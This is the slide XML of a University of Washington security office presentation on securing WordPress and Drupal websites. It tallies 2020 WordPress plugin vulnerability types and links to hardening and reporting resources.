        <p:nvPicPr>
          <p:cNvPr id="37" name="Google Shape;37;p7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7645425" y="4350900"/>
            <a:ext cx="1177075" cy="792600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Google Shape;38;p7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="502925" y="4837863"/>
            <a:ext cx="2129201" cy="143437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Google Shape;39;p7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502925" y="2494525"/>
            <a:ext cx="8173800" cy="6129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2400"/>
              <a:buFont typeface="Encode Sans"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Encode Sans"/>
                <a:ea typeface="Encode Sans"/>
                <a:cs typeface="Encode Sans"/>
                <a:sym typeface="Encode Sans"/>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ody" type="tx">
  <p:cSld name="TITLE_AND_BODY">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 40"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Google Shape;41;p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4B2E83"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Encode Sans Condensed Thin"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Encode Sans Condensed Thin"/>
                <a:ea typeface="Encode Sans Condensed Thin"/>
                <a:cs typeface="Encode Sans Condensed Thin"/>
                <a:sym typeface="Encode Sans Condensed Thin"/>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2" name="Google Shape;42;p8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-381000" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans SemiBold"/>
              <a:buChar char="&gt;"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans SemiBold"/>
                <a:ea typeface="Open Sans SemiBold"/>
                <a:cs typeface="Open Sans SemiBold"/>
                <a:sym typeface="Open Sans SemiBold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-355600" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans SemiBold"/>
              <a:buChar char="⎼"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans SemiBold"/>
                <a:ea typeface="Open Sans SemiBold"/>
                <a:cs typeface="Open Sans SemiBold"/>
                <a:sym typeface="Open Sans SemiBold"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Open Sans SemiBold"/>
              <a:buChar char="&gt;"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans SemiBold"/>
                <a:ea typeface="Open Sans SemiBold"/>
                <a:cs typeface="Open Sans SemiBold"/>
                <a:sym typeface="Open Sans SemiBold"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-330200" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Open Sans SemiBold"/>
              <a:buChar char="⎼"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans SemiBold"/>
                <a:ea typeface="Open Sans SemiBold"/>
                <a:cs typeface="Open Sans SemiBold"/>
                <a:sym typeface="Open Sans SemiBold"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-317500" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Open Sans SemiBold"/>
              <a:buChar char="&gt;"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans SemiBold"/>
                <a:ea typeface="Open Sans SemiBold"/>
                <a:cs typeface="Open Sans SemiBold"/>
                <a:sym typeface="Open Sans SemiBold"/>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gt;"/>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gt;"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Google Shape;43;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426725" y="1061288"/>
            <a:ext cx="1019175" cy="47625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Google Shape;44;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6871400" y="4830450"/>
            <a:ext cx="1960901" cy="1320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itle">
  <p:cSld name="TITLE_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="4B2E83"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 45"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Google Shape;46;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7645425" y="4350900"/>
            <a:ext cx="1177075" cy="792600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Google Shape;47;p9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="502925" y="4837863"/>
            <a:ext cx="2129201" cy="14343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mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition p14:dur="2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27" name="Google Shape;27;p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28" name="Google Shape;28;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Lst>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition p14:dur="2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wpscan.com/"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hyperlink" Target="https://www.drupal.org/security"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ordpress.org/support/article/hardening-wordpress"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hyperlink" Target="https://www.drupal.org/docs/security-in-drupal"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mailto:ciso@uw.edu"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s://developer.wordpress.org/themes/theme-security/"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hyperlink" Target="https://www.drupal.org/docs/develop/security" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.wordpress.org/plugins/security/"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learning.oreilly.com/home/"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ciso.uw.edu/report/" TargetMode="External"/><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hyperlink" Target="mailto:ciso@uw.edu" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://privacy.uw.edu/report/"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ciso.uw.edu/education/online-training/" TargetMode="External"/><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hyperlink" Target="https://ciso.uw.edu/education/infographics/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ciso.uw.edu/education/risk-advisories/"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mailto:ciso@uw.edu" TargetMode="External"/><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hyperlink" Target="mailto:pgraff@uw.edu" TargetMode="External"/><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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.drupal.org/docs/security-in-drupal" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ciso.uw.edu/ciso-news-and-alerts/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/support/article/hardening-wordpress" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:ciso@uw.edu" TargetMode="External"/><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hyperlink" Target="https://ciso.uw.edu/education/online-training/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learning.oreilly.com/home/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://privacy.uw.edu/report/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.drupal.org/security" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ciso.uw.edu/report/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wpscan.com/"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mailto:ciso@uw.edu"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ciso@uw.edu"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B2E83"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 51"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Google Shape;52;p10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="453050" y="1317625"/>
            <a:ext cx="8162100" cy="2001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dirty="0"/>
              <a:t>Securing UW Websites: Threats &amp; Best Practices</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0">
                <a:latin typeface="Encode Sans"/>
                <a:ea typeface="Encode Sans"/>
                <a:cs typeface="Encode Sans"/>
                <a:sym typeface="Encode Sans"/>
              </a:rPr>
              <a:t>January 7, 2021</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Encode Sans"/>
              <a:ea typeface="Encode Sans"/>
              <a:cs typeface="Encode Sans"/>
              <a:sym typeface="Encode Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400" dirty="0">
                <a:latin typeface="Encode Sans"/>
                <a:ea typeface="Encode Sans"/>
                <a:cs typeface="Encode Sans"/>
                <a:sym typeface="Encode Sans"/>
              </a:rPr>
              <a:t>Office of the Chief Information Security Officer</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Encode Sans"/>
              <a:ea typeface="Encode Sans"/>
              <a:cs typeface="Encode Sans"/>
              <a:sym typeface="Encode Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Encode Sans"/>
              <a:ea typeface="Encode Sans"/>
              <a:cs typeface="Encode Sans"/>
              <a:sym typeface="Encode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WordPress Theme, Plugin 2020</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;107;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261500"/>
            <a:ext cx="4265700" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>5 - Cross-site scripting</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>4 - SQL injection</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>4 - Arbitrary file upload</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>3 - Remote code execution</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;108;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4741525" y="1261500"/>
            <a:ext cx="4265700" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>2 - Cross-site request forwarding</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>1 - Privilege escalation</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>1 - File inclusion</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>3 - Indeterminant</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="10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WordPress Theme, Plugin 2020 (2 of 2)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Google Shape;114;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261500"/>
            <a:ext cx="4265700" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>5 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Cross-site scripting</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>4 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>4 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Arbitrary file upload</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>3 - Remote code execution</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4719125" y="1261500"/>
            <a:ext cx="4265700" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>2 - Cross-site request forwarding</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>1 - Privilege escalation</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
